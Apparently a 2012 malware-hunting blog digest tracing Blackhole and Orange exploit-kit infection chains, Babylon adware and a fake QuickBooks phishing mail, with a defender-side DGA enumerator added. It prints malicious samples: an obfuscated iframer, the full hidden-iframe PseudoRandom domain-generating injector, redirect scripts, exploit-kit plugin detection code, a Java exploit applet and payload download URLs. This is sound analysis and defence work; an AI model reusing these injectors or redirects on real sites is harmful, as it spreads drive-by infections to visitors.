Friday, 31 August 2012

I was not joking when I said to make war against malware directly,
this weekend is going to be a bad time for those infectors in the world.
I got some blocking and have some portscanning too, good!

And I am doing it for real; yet I will keep on sharing what I personally find.
I shared what I can share only, yet there is a lot of stuff I just cannot share.

Below is my blog list of what I investigated in the first 12 hours.

Let's do our part well, let's battle these malwares this weekend.
To those who cannot join or support, please stop mocking!
Support us. Hint us. Advise us!

To the members of MalwareMustDie,
Friends, please write any findings, any analysis, anything,
to the pastebin, to the blogs, and expose as many malware schemes as you can,
in any way you can.
It is hard to do, but I did it, which means you can do it better;
I wrote those in English, even harder for me, yet I did some within a day.
So let's hunt together & expose more malwares!

#MalwareMUSTdie!

It begins from the infected hosting homepage of hxxp://dansenbijjansen.com/
It is a good, honest site. Sadly, it has suspicious code at
hxxp://dansenbijjansen.com/foto/index.php?



I downloaded it to examine and found the JS code below:
<script>el=document.createElement("div");try{a}catch(qq)
{el.appendChild(document.createElement("p"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"),el.childNodes[1]);with(el)
{appendChild(document.createTextNode("eva"));}}
k=el.lastChild.nodeValue;ar="A4 2E\"lTb?we
Cy";ar2="R8c8c140c116c192c96c148c176c160c128c76c44c168c92c132c172c44
c92c16c24c44c76c44c168c92c68c80c200c28c52c172c124c52c76c44c96c152c32
c176c148c200c152c156c84c108c100c156c88c8c8c8c140c116c104c52c76c44c104
c96c156c180c8c8c120c192c44c24c68c44c192c88c8c8c8c148c176c160c128c76
c44c168c92c132c40c104c140c92c44c96c20c48c140c116.....and so on....


↑This was easy to deobfuscate, revealing the iframer below...
<iframe src='hxxp://tr2.4voip.biz/in.cgi?2' width='10' height='10' style=
'visibility:hidden;position:absolute;left:0;top:0;'></iframe>


Which made me check hxxp://tr2.4voip.biz/in.cgi?2 and find
the multiple malicious links coded below:


↑The above links obviously exist to make sure users are
redirected to the HTML file below, which carries another JS code:


It will lead us to the link of:
hxxp://fwdservice.com/main.php?dmn=4voip.biz&folio=7POYGN0G2&gkwrf&p_bkt=


What's this? We have many references about it in the urlquery below:


This is actually a URL forwarder service used to redirect requests to some
other URL for downloading or other purposes. I checked the recorded URLs
and found the format of the query looks like:
hxxp://fwdservice.com/main.php?dmn=lejebolig.net&folio= \
7POJ4E717&gkwrf=hxxp://www.ansa.no/ANSAland/Danmark/Lokallag/\
Kobenhavn/A-bo-i-Kobenhavn/Finne_bolig_i_Kobenhavn/&p_bkt=
Or....
hxxp://fwdservice.com/main.php?dmn=sniegul.com&folio=
7POYGN0G2&gkwrf=http://priv.ckp.pl/moonforge/&p_bkt=


In our case the specific ticket (folio=7POYGN0G2) and
domain (dmn=4voip.biz) forwarded us to a special path on the 4voip.biz host.
Feel free to check and analyze further what you can get from that host.

The interesting part is that tr2.4voip.biz and fwdservice.com are in the
same network:


Sharing the same IP address with lame malicious domains like:
netsecur.com
wwwfaceboko.com
yourmoneybox.net

Blacklisting 4voip.biz and fwdservice.com would be a nice idea!

When I hunt honeypot Blackhole exploit kit (BHEK) blacklists
for infections, I often come to see some URLs ending with js.js.
The file has the same extension each time, but its contents actually differ
depending on the malware epidemic's exploitation, i.e. how the BHEK wants to
infect users at that time.

Previously, the trend I found in the js.js code was a mere
common injected obfuscation script like:

or

↑It was obvious that we must crack this code to get to the next
hop of the malware source.

But the recent js.js that I found was mostly/practically a JavaScript call to
another text file containing "document.location=" of certain Blackhole sites.
The moral of this writing is that we can nail bigger stuff / new epidemics by
understanding the parameters produced by the recent ones.

Allow me to demonstrate this theory. Let's see the real infected URLs below:
209.215.118.13 hXXp://209.215.118.136/fFDrSXRM/js.js
200.219.245.75 hXXp://aainstalacoeseletricas.com.br/3XmimsHL/js.js
184.107.196.218 hXXp://www.celucentro.com.co/qgmZiWk7/js.js
82.98.87.89 hXXp://wilde.webprojekt.ch/v8bPW1U4/js.js
85.214.26.149 hXXp://advantage-media-sports.com/26MxXngr/js.js
194.170.160.46 hXXp://www.admirals.ae/mC9o9rRd/js.js


This will connect you to the certain "document.location=" below:
document・location='hXXp://209.59.222.20/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';
document・location='hXXp://50.116.54.37/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';
document・location='hXXp://173.230.130.248/pxyk80ujzb03h.php?y=078eb263358008ea';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=gawit01smae175m0';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';


The lesson teaches us to understand the current trend of parameters used in
Blackhole, which is:
/pxyk80ujzb03h.php?y=


Let's prove this theory by searching for the above string in the
malware domain list site:



↑Voila! We got ourselves a new hunting field. :-)
PS: This post is dedicated to fellow malware hunters
#MalwareMustDie!
A while ago we had the PseudoRandom infector spread via Blackhole.
Lucky me to have just bumped into one; I thought it was already wiped out clean.
Here's the story of it.

I got the hint of the infected URL via spam caught by my own spam filter.
Here's the URL:
hxxp://www.strow.es/proyectos/destacado.html


As usual fetch it:
--03:48:46-- hxxp://www.strow.es/proyectos/destacado.html
=> `destacado.html'
Resolving www.strow.es... 212.59.199.22
Connecting to www.strow.es|212.59.199.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,808 (22K) [text/html]
100%[====================================>] 22,808 29.32K/s
03:48:48 (29.25 KB/s) - `destacado.html' saved [22808/22808]


Let's see the timestamp of it...
-rwx------ 1 r00t b33r 22808 Aug 8 02:29 destacado.html

↑Ah, an old infected file that got left over..

It is a common HTML file, nothing special except that it was injected with JavaScript;
the code was after the tag, like below:

You can see the code in pastebin --->>>>[HERE]

This is actually PseudoRandom JS code with the eval() value below;
of course it is not exactly as-is.. you cannot run it by just pasting it.
function nextRandomNumber(){
var hi = this .seed / this .Q;
var lo = this .seed % this .Q;
var test = this .A * lo - this .R * hi;
if (test > 0){
this .seed = test;
}
else {
this .seed = test + this .M;
}
return (this .seed * this .oneOverM);
}
function RandomNumberGenerator(unix){
var d = new Date(unix * 1000);
var s = Math.ceil(d.getHours() / 3);
this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) +
(d.getDate() * 0xFFFF) + (Math.
round(s * 0xFFF));
this .A = 48271;
this .M = 2147483647;
this .Q = this .M / this .A;
this .R = this .M % this .A;
this .oneOverM = 1.0 / this .M;
this .next = nextRandomNumber;
return this ;
}
function createRandomNumber(r, Min, Max){
return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
var rand = new RandomNumberGenerator(unix);
var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
var str = '';
for (var i = 0; i < length; i ++ ){
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}
setInterval(function (){
try {
if (typeof iframeWasCreated == "undefined"){
var unix = Math.round( + new Date()/ 1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "hxxp://" + domainName + "/in.cgi?15");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
iframeWasCreated = true;
}
}
catch (e){
iframeWasCreated = undefined;
}
}
, 100);

The paste of code is in here===>>>>[HERE]

Well, this will lead you to the landing page below:
hxxp://xkqaiqqirreqaqwd.ru/in.cgi?15

↑But don't get upset since nothing is in there anymore ;-)

My point is for you to see what they coded in PseudoRandom.
Read the code well and you will know how it works.
The stupid thing about using PseudoRandom is that there are no "really" random URLs;
you have to leave something to be merged into the URL.
For this sample it is easy to grep "/in.cgi?" and see what happened in the Domain List.
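As an added example (not code from the post, nor from whoever wrote the injected script), here is the generator above ported into a defender-side tool: because the seed depends only on month, day of month and a 3-hour slot of the victim's local clock, every domain it can produce on a given day can be enumerated ahead of time and matched against DNS query names. The log lines and their format are constructed for the demo.

```javascript
// Added example (not code from the post): a defender-side port of the
// PseudoRandom generator shown above. The injected script seeds its LCG only
// from the month, the day of the month and a 3-hour slot of the victim's local
// clock (the year is never used), so every domain it can produce on a given
// day can be enumerated in advance and matched against DNS logs or blocklisted.

// Alphabet copied from the injected script, duplicates included, because the
// generator indexes it by position.
const LETTERS = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split("");

// The generator reproduced with the same floating-point arithmetic as the
// JavaScript original (Q is a float there, not an integer Schrage quotient).
class PseudoRandom {
  constructor(seed) {
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.seed = seed;
  }
  next() {
    const hi = this.seed / this.Q;
    const lo = this.seed % this.Q;
    const test = this.A * lo - this.R * hi;
    this.seed = test > 0 ? test : test + this.M;
    return this.seed * this.oneOverM;
  }
}

// Seed formula from RandomNumberGenerator(): month is 0-based (getMonth),
// day is 1-based (getDate), slot = ceil(hours / 3), so it runs 0..8.
function seedFor(month, day, slot) {
  return 2345678901 + month * 0xffffff + day * 0xffff + Math.round(slot * 0xfff);
}

// generatePseudoRandomString() for one (month, day, slot) triple.
function domainFor(month, day, slot, length = 16, zone = "ru") {
  const rand = new PseudoRandom(seedFor(month, day, slot));
  let str = "";
  for (let i = 0; i < length; i++) {
    // createRandomNumber(rand, 0, letters.length - 1)
    str += LETTERS[Math.round((LETTERS.length - 1) * rand.next())];
  }
  return str + "." + zone;
}

// Every distinct domain the script can produce on a calendar day, in any year.
function domainsForDay(month, day) {
  const out = new Set();
  for (let slot = 0; slot <= 8; slot++) out.add(domainFor(month, day, slot));
  return [...out];
}

// The malware's own call path: a unix timestamp read through the local clock,
// exactly as the victim's browser would do it.
function domainForTimestamp(unix) {
  const d = new Date(unix * 1000);
  return domainFor(d.getMonth(), d.getDate(), Math.ceil(d.getHours() / 3));
}

// Cheap shape filter for when the day is unknown: 16 letters drawn only from
// the generator's alphabet, under the .ru zone this sample used.
const DGA_SHAPE = /^[abdefgiklnopqrsuvwxyz]{16}\.ru$/;
function looksLikeDga(host) {
  return DGA_SHAPE.test(host.toLowerCase().replace(/\.$/, ""));
}

// Scan DNS query log lines (constructed format: "<time> <client> <qname> <type>")
// and return the query names that fall in the day's candidate set.
function findDgaQueries(logLines, month, day) {
  const candidates = new Set(domainsForDay(month, day));
  const hits = [];
  for (const line of logLines) {
    const fields = line.trim().split(/\s+/);
    if (fields.length < 3) continue;
    const qname = fields[2].toLowerCase().replace(/\.$/, "");
    if (candidates.has(qname)) hits.push(qname);
  }
  return hits;
}

// Constructed demo for 8 August (month index 7), the date on the infected file.
const AUG8 = domainsForDay(7, 8);
const SAMPLE_LOG = [
  "2012-08-08T09:12:01 10.0.0.5 www.example.com A",       // constructed, benign
  "2012-08-08T09:12:03 10.0.0.5 " + AUG8[0] + " A",       // constructed DGA hit
  "2012-08-08T09:12:09 10.0.0.7 xkqaiqqirreqaqwd.ru A",   // landing host from the post
];
console.log("candidates for 8 Aug:", AUG8);
console.log("hits in sample log:", findDgaQueries(SAMPLE_LOG, 7, 8));
console.log("shape match for the post's landing host:", looksLikeDga("xkqaiqqirreqaqwd.ru"));
```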

I am following the steps of infection of ONE spam mail which led to a sophisticated exploit kit which dropped MANY malwares; during infection it automatically detects your browser and PC to find the best mess to drop/infect you with.

The dropped malware collection is in the pic below:

↑As you can see, all are dated today; they are fresh. Don't worry, the samples are out there, grab them all.
This threat is so nasty that I think I need to blog it. Below is the report.

I believe some of you received or are seeing mail like this:
Date: Tue, 28 Aug 2012 11:04:30 -0400
From: "Intuit Payroll Services"
Subject: QuickBooks Security Update

You will not be able to access your Intuit QuickBooks
without updated Intuit Security Tool (IST™) after 31th of August, 2012.

You can update Intuit Security Tool here.

After a successful download please run the setup for an automatic
installation, then login to Intuit Quickbooks online to check that
it is working properly.

This email was sent from an auto-notification system that
can't accept incoming email. Please don't reply to this message.

You have received this business communication as part of our efforts to fulfill
your request or service your account.
You may receive this and other business communications from us
even if you have opted out of marketing messages.

Terms, conditions, pricing, features, and service options are
subject to change. View our complete Terms of Service.


If you click the terms and conditions you will access the link below:
hxxp://babyu.onedaynet.co.kr/JHF0X3B/index.html


After accessing the URL you will get the malicious index.html like below:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript"
src="hXXp://66.242.140.34/LA5S92vH/js.js"></script>
<script type="text/javascript"
src="hXXp://freerobinfly.com/sS5N3rtK/js.js"></script>
<script type="text/javascript" src="
hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js"></script>

</html>

↑It is a not-good index.html; let's check it in VirusTotal:
MD5:       5d323254ee15f460a6bd6f7262cd3c42
File size: 327 バイト ( 327 bytes )
File name: output.2145601.txt
File type: HTML
Tags: html
Detection ratio: 18 / 42
Analysis date: 2012-08-31 12:47:34 UTC
URL: [CLICK]


If you trace the three URLs written in that HTML,
they will lead you to the same JavaScript file. I traced it like this:
--00:27:31-- hXXp://66.242.140.34/LA5S92vH/js.js
=> `js.js'
Connecting to 66.242.140.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78 --.--K/s
00:27:32 (2.72 MB/s) - `js.js' saved [78/78]

--00:27:40-- hXXp://freerobinfly.com/sS5N3rtK/js.js
=> `js.js.1'
Resolving freerobinfly.com... 74.208.242.135
Connecting to freerobinfly.com|74.208.242.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78 --.--K/s
00:27:41 (371.47 KB/s) - `js.js.1' saved [78/78]

--00:27:47-- hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js
=> `js.js.2'
Resolving ftp.santoscortereal.com.br... 200.98.197.17
Connecting to ftp.santoscortereal.com.br|200.98.197.17|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78 --.--K/s
00:27:48 (1.92 MB/s) - `js.js.2' saved [78/78]


Let's see what's inside this js.js:
document・location='hXXp://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea';

↑Another redirection. OK. This is no good either; let's check in VirusTotal again:
MD5: e2525763bdf95e9a33001fd231ee109e
File size: 78 バイト ( 78 bytes )
File name: js.js
File type: Text
Detection ratio: 3 / 42
Analysis date: 2012-08-31 15:59:42 UTC ( 0 分 ago )
URL: [CLICK]

↑OK, at least three antivirus products detected it.

Let's grab it too and see what's inside ↓
--00:29:18-- http://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea
=> `pxyk80ujzb03h.php@y=078eb263358008ea'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 69,236 115.00K/s
00:29:20 (114.70 KB/s) - `pxyk80ujzb03h.php@y=078eb263358008ea' saved [69236]


And the inside is obfuscated code like this:

↑This is definitely not good at all; let's check it in VirusTotal first↓
MD5: 643e431692f6ce0eaf4bb4bdb1e0ed4a
File size: 67.6 KB ( 69236 bytes )
File name: pxyk80ujzb03h.php@y=078eb263358008ea
File type: HTML
Detection ratio: 2 / 42
Analysis date: 2012-08-31 16:18:34 UTC ( 0 分 ago )
URL: [CLICK]

Oh, looks like I am the first who uploaded this sample.
Well, at least NOW we still have 2 antivirus products detecting it.

If you deobfuscate it right you will have the result below;
one part is this code:
document・write('<center>Waiting for redirect...</center>');
function end_redirect(){
window・location.href = 'hxxp://davidkellett.co.uk/updateflashplayer.exe';


And the other is a plugin detector in JavaScript:
var PluginDetect = {
version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
return function (){
c(b, a) <etc etc>.....


It detects your OS:
c.OS = 100;
if (b){
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
, 100];
for (f = d.length - 2; f >= 0; f = f - 2){
if (d[f] && new RegExp(d[f], "i").test(b)){
c.OS = d[f + 1];
break


It senses your browser user agent for the right drops:
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
b = a.platform || "", h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins){
if (c.Plugins[f]){
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}


Sensing the elements to install messes into your browser:
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
null ;
c.ActiveXEnabled = false;
if (c.isIE){
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
"ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
"Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f ++ ){
if (c.getAXO(j[f])){
c.ActiveXEnabled = true;
break


And checking which browser you have:
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?


Very interesting to know that this code is considering using Java against you:
DTK : {
$ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null,
Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA",
"clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [
"application/java-deployment-toolkit",
"application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled :
function (){
:
:
:
var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" +
(a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
for (h = 0; h < f.JavaVersions.length; h ++ ){
d = f.JavaVersions[h];
n = "JavaPlugin." + d[0] + "" + d[1];
b = d[0] + "." + d[1] + ".";
for (l = d[2];
l >= 0; l -- ){
r = "JavaWebStart.isInstalled." + b + l + ".0";
if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO


Well, it is sophisticated, isn't it? The full deobfuscated code is here ====>>> [CLICK]

OK, let's go further. The deobfuscated code above also brings you the shellcode below:


This will lead you to download a file from:
hxxp://50.116.44.177/p.php?f=01400&e=1


So we have two new download URLs that we can assume are payloads; let's check.
The first URL is:
--00:34:48-- hxxp://davidkellett.co.uk/updateflashplayer.exe
=> `updateflashplayer.exe'
Resolving davidkellett.co.uk... 209.235.144.9
Connecting to davidkellett.co.uk|209.235.144.9|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 371,112 (362K) [application/x-msdownload]
100%[====================================>] 371,112 72.82K/s ETA 00:00
00:34:55 (52.38 KB/s) - `updateflashplayer.exe' saved [371112/371112]


In VirusTotal the score is 11/42:
MD5: 4c22e00d38a44b810f6103ec6837b137
File size: 362.4 KB ( 371112 bytes )
File name: updateflashplayer.exe
File type: Win32 EXE
Tags: peexe
Detection ratio:11 / 42
Analysis date: 2012-08-31 15:29:23 UTC ( 7 分 ago )
URL: [CLICK]

↑It looks like Zbot. I am not an expert with naming stuff;
anyway, I wrote the malware details in the VirusTotal page..

The other drop goes to:
--00:36:20-- http://50.116.44.177/p.php?f=01400
=> `p.php@f=01400'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177,576 (173K) [application/x-msdownload]
100%[===================================> ] 177,576 147.57K/s
00:36:22 (147.13 KB/s) - `p.php@f=01400' saved [177576/177576]


This is also bad stuff; in VirusTotal only 1 (one) vendor detected it.
MD5: 096a79434392461517907c6f62b27cd1
File size: 173.4 KB ( 177576 bytes )
File name: sample
File type: Win32 EXE
Tags: peexe
Detection ratio:1 / 42
Analysis date: 2012-08-31 15:37:57 UTC ( 1 時間, 23 分 ago )
URL: [URL]

↑It is a Trojan; it runs as a daemon/process, reads keyboard & screen,
and worst of all fakes a Microsoft binary with yesterday's compilation date.
(Contents are regularly updated to share the closest possible to the facts.)
Some MDLs have already been informed and published these URLs, so I have no reason to hold them anymore:

payloads:

(1) hXXp://mxcwqdkbphcx.lookin.at/main.php?page=c9ee61ed42809775
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
classical one↑


(2) hXXp://02e9126.netsolhost.com/nfjviq3D/index.html
^^^^^^^^^^^^^^^^^^^^
↑Good trick, don't be fooled with index.html
(Information: this is actually iframer lead to BHEK at the below link)

hXXp://66.175.222.25[/]pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
↑Not usual one, look at the parameter at php file


(3) hXXp://crane.co.th/YabymY6p/index.html
^^^^^^^^^^^^^^^^^^^^
↑see the above randomized subdir?


Conclusion:
You can set up almost every infection scheme in the Blackhole interface,
yet the characteristics are still there.

Note:
This page is here because of the team work of malware researchers.
Thank you to those who contributed the contents, to those who corrected and advised,
to those who read and share, and God & prayers bless those who take
direct action straight at these threats.

BTW, No, I am telling you #MalwareMustDie is not selling crap.

A lot of you know about Babylon adware, don't you?
We ignored these guys for so long. We thought they would raise no threat. Now they are spreading "with" a good evil-distribution scheme (if I cannot call it infection).
Realizing the network they have that we investigated, Babylon is now an adware that spreads like an exploit pack. We should raise market awareness of this trend; who knows, one day malware may come and ride under the Babylon scheme to become a new epidemic vector..
Please read the PoC below:

We snipped a piece of research and found the URL below:
>> --12:23:06--
>> http://www.destorage.info/installmate/php/get_cfg.php?step_id=1
>> => `get_cfg.php@step_id=1'
>> Resolving www.destorage.info... 46.165.199.26
>> Connecting to www.destorage.info|46.165.199.26|:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 6,614 (6.5K) [text/html]
>> 100%[====================================>] 6,614 --.--K/s
>> 12:23:07 (1.07 MB/s) - `get_cfg.php@step_id=1' saved [6614/6614]


Got curious, so I looked inside↓
>> blah\GnuWin32\bin\dump>cat "get_cfg.php@step_id=1"
>> ■[ I n s t a l l e r ]
>> P u b l i s h e r N a m e = " P r e m i u m "
>> P r o d u c t N a m e = " S e t u p "
>> P r o d u c t V e r s i o n = " 1 . 0 "
>> P r o d u c t C o d e = " { 1 7 E B 6 D D C - 1 5 2 2 - 7 2 F 9 - D 5 A E
>> - 7 B
>> 1 F C 1 C 4 8 7 C E } "
>> P u b l i s h e r I D = " 0 "
>> S o u r c e I D = " 0 "
>> P a g e I D = " 0 "
>> A f f i l i a t e I D = " % I n s t a l l e r _ A f f i l i a t e I D % "
>> I n s t a l l e r I D = " 0 "
>> V i s i t o r I D = " 0 "
>> L o c a l e = " e n "
>> D a t e = " 2 0 1 2 / 0 8 / 3 1 "
>> T i m e = " 3 : 2 3 : 0 6 "
>> S h o w I n T a s k b a r = " 1 "
>> H i d e S c r e e n s = " 0 "
>> I n s t a l l e r M o d e = " "
>>
>> [ S e r v e r ]
>> I D = " 0 "
>> L o c a t i o n = " D E "
>>
>> [ U s e r I n f o ]
>> G e o L o c a t i o n = " J P "
>> I P A d d r e s s = " 1 2 1 . 3 . 1 7 3 . 1 9 1 "
>> W e b B r o w s e r = " 0 "
>>
>> [ R n d G e n ]
>> P e r c e n t a g e = " 2 1 "
>>
>>
>> [ S c r e e n 7 5 ]
>> T i t l e = " S e t u p "
>> B u t t o n 1 = " Y e s "
>> B u t t o n 2 = " & N o "
>> L a b e l 1 = " A r e y o u s u r e ? "
>> :
>> :
>> etc


FYI, this server is serving Babylon adware and is spreading either with its "kinda" exploit
pack, or using the Exploit Pack method. So below is the conclusion:
1. The infector URL is using the exploit pack format.
2. It definitely logs the PC information during installation via the browser and takes
a snapshot of it on the server.
3. It backdoors the installer without the user's permission.
Analysis:

Good researcher friends to whom I promised confidentiality advised that the site is also compromised with "suspected" malwares (I didn't analyze them yet) as follows:


> 46.165.199.26/v9/
> 46.165.199.26/v10/ VirusTotal Check is HERE-->>>[CLICK]
> 46.165.199.26/v14/
> 46.165.199.26/v52/
> 46.165.199.26/v209/

Additional/updated Note:
↑I am following the reported downloaded program described above (VT Report).
This file explains to us why the PC information got uploaded to the server.
File: WxDownload.exe 68ee6e35ef7f495be727131dc4ef5ed9
It is a binary installer using Tarma InstallMate 7 which, like a usual installer, drops:
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setup.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setupx.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.exe
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.ico
C:\Document..\Local Settings\Temp\Tsu5F686192.dll
(I don't go to details on it yet.....)

↑It is "assumed" those will start installing nasty adware on your PC and so on..
(I am sorry for not going into detail on it either)

My point is, this installer sends your PC data to the motherships as per below;
DNS QUERIES:
www.reportde.info IN A +
www.destorage.info IN A +
www.reportnl.info IN A +
www.nlstorage.info IN A +

HTTP POSTS:
www.reportde.info POST
www.reportnl.info POST
values: "/installmate/php/track_installer_products.php?installer_version=75 HTTP/1.1"

HTTP REQUESTS:
www.destorage.info GET (3 times)
www.nlstorage.info GET (3 times)
values =
/installmate/php/get_cfg.php?
step_id=1&
installer_id=5040612c774655.01371722&
publisher_id=10&
source_id=0&
page_id=0&
affiliate_id=0
&geo_location=JP&
locale=EN&
browser_id=4 HTTP/1.1

In the HTTP POST part it sends the installer version info, which is maybe OK, but..
In the HTTP GET part it sends your GeoIP location, PC locale, browser information,
and of course your IP address. It is a PoC proving why the records on the server exist.

OK, the research continues to the detected IP addresses of the Babylon spreader services.
Multiple directories were detected being used for download link distribution:
> Fast check showed :
> /v9/
> /v17/
> /v14/
> /v16/
> /v20/
> /v21/
> /v10/
> /v26/
> /v37/
> /v33/
> /v27/
> /v34/
> /v31/
> /v43/
> /v46/
> /v47/
> /v48/
> /v45/
> /v51/
> /v42/
> /v58/
> /v56/
> /v52/
> /v54/
> /v53/
> /v57/
> /v62/
> /v68/
> /v64/
> /v66/
> /v69/
> /v70/
> /v72/
> /v67/
> /v75/
> /v71/
> /v73/
> /v78/
> /v76/
> /v74/
> /v77/
> /v79/
> /v82/
> /v80/
> /v81/
> /v87/
> /v86/
> /v88/
> /v84/
> /v83/
> /v98/
> /v94/
> /v96/
> /v95/
> /v99/
> /v97/
>
> I guess you can try 1xx, 2xx, 3xx

Other researchers detected the mirroring scheme of 46.165.199.26 to same-segment IP addresses:
46.165.199.26/v14/ 301720
46.165.199.3/v14/ 301720
46.165.199.25/v14/ 301720

For which some similarities in the downloaded files were detected:
> http://95.211.152.157/v17/ 299048
> filename="BCool.exe"
> http://95.211.150.1/v17/ 299048
> filename="BCool.exe"
> http://95.211.152.156/v17/ 299048
> filename="BCool.exe"
As you can see, adware is not something we can just ignore. This adware's distributor has started to play nasty & to victimize innocent people.
Feel free to put your comment to add to the current information.

Thursday, 30 August 2012

If you see the infected page with this code:

Don't be surprised that it is undetected:

This is the orange exploit pack infector HTML analyzed in ---->>> [ H E R E ]

It is an HTML file infected with the Orange exploit pack.
I am following the @kafeine report of it.
Source: hxxp://breitlingline.biz/

With the infector HTML/iframe:

<iframe src="hxxp://petrol.thehickorymotormile.com:8382/AZAgQw?wITGN=78" width=0 height=0 frameborder=0></iframe>

The VT detection is very low = 1/41

Java exploits for CVE-2008-5353 and CVE-2012-0507 were detected at the iframe-redirected URL, giving you a malicious applet like:

<html><head></head>
<body>
<applet archive="24" code="WCfn.class" width="8" height="7"><param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"><param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"></applet>
<p>HKKatmqLjj</p><br>
<embed src="255" width="518" height="364">
</body>

Taking you to the execution of the shellcodes below:



And your PC will download from:

hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=% (and)
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=5

The first & second downloads are going to be the same payload malware:

0318c42a3f.exe 059b029e9f645bafde2d603b73221f19

Which will drop:

C:\Documents and Settings\Administrator\Application Data\Apynf
C:\Documents and Settings\Administrator\Application Data\Apynf\qeawq.kio
C:\Documents and Settings\Administrator\Application Data\Iluva
C:\Documents and Settings\Administrator\Application Data\Iluva\ipamr.exe
C:\Documents and Settings\Administrator\Application Data\Inazci
C:\Documents and Settings\Administrator\Application Data\Inazci\ikat.uql

OR

C:\Documents and Settings\Administrator\Application Data\Xuhika
C:\Documents and Settings\Administrator\Application Data\Xuhika\kaby.zio
C:\Documents and Settings\Administrator\Application Data\Ydywba
C:\Documents and Settings\Administrator\Application Data\Ydywba\kifag.exe
C:\Documents and Settings\Administrator\Application Data\Ytwy
C:\Documents and Settings\Administrator\Application Data\Ytwy\cuakr.abp

Those binaries create this registry key:

